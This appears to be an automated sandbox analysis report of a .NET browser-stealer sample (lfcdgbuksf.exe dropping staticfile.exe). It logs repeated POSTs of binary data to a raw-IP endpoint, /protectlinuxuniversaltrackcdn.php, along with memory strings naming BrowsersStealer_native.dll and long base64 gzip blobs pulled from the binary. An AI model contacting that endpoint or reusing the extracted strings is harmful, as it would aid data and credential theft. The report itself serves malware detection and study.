                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1404Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownTCP traffic detected without corresponding DNS query: 213.108.22.118
                  Source: unknownHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 332Expect: 100-continueConnection: Keep-Alive
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000284E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000274E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.108.22.118
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.108.22.118/
                  Source: staticfile.exe, 00000006.00000002.4162410596.0000000002966000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000284E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.000000000274E000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://213.108.22.118/protectlinuxuniversaltrackcdn.php
                  Source: lfcdgbuksf.exe, 00000000.00000002.1737239542.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000006.00000002.4162410596.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                  System Summary

                  barindex
                  .NET source code contains very large strings
                  Source: lfcdgbuksf.exe, s67.csLong String: Length: 581036
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B8034150_2_00007FFD9B803415
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B9E9C700_2_00007FFD9B9E9C70
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B9E10480_2_00007FFD9B9E1048
                  Source: C:\Users\user\Desktop\lfcdgbuksf.exeCode function: 0_2_00007FFD9B9E11280_2_00007FFD9B9E1128
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BA034156_2_00007FFD9BA03415
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9B9F1EC36_2_00007FFD9B9F1EC3
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE0AFC6_2_00007FFD9BBE0AFC
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE12A86_2_00007FFD9BBE12A8
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE12B86_2_00007FFD9BBE12B8
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE12986_2_00007FFD9BBE1298
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE12086_2_00007FFD9BBE1208
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE11286_2_00007FFD9BBE1128
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE09556_2_00007FFD9BBE0955
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE17F26_2_00007FFD9BBE17F2
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE16D46_2_00007FFD9BBE16D4
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE163D6_2_00007FFD9BBE163D
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE0DC06_2_00007FFD9BBE0DC0
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE15186_2_00007FFD9BBE1518
                  Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 6_2_00007FFD9BBE14986_2_00007FFD9BBE1498
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BRqdbrgY.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                  Source: DDWtiErR.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: vZNEzLck.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: dNlyfpHV.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: BRqdbrgY.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                  Source: lfcdgbuksf.exe, 00000000.00000002.1744691843.000000001B7F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exe, 00000000.00000000.1679362704.0000000000AF8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exe, 00000000.00000002.1736729597.00000000014E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exe, 00000000.00000002.1739071876.000000001350F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exe, 00000000.00000002.1739071876.00000000138C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs lfcdgbuksf.exe
                  Source: lfcdgbuksf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: lfcdgbuksf.exe, E32.csCryptographic APIs: 'TransformBlock'
                  Source: lfcdgbuksf.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                  Source: lfcdgbuksf.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                  Source: ZFopJXMZ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: DDWtiErR.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: vZNEzLck.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: dNlyfpHV.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: lfcdgbuksf.exe, s67.csBase64 encoded string: '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
                  Source: lfcdgbuksf.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
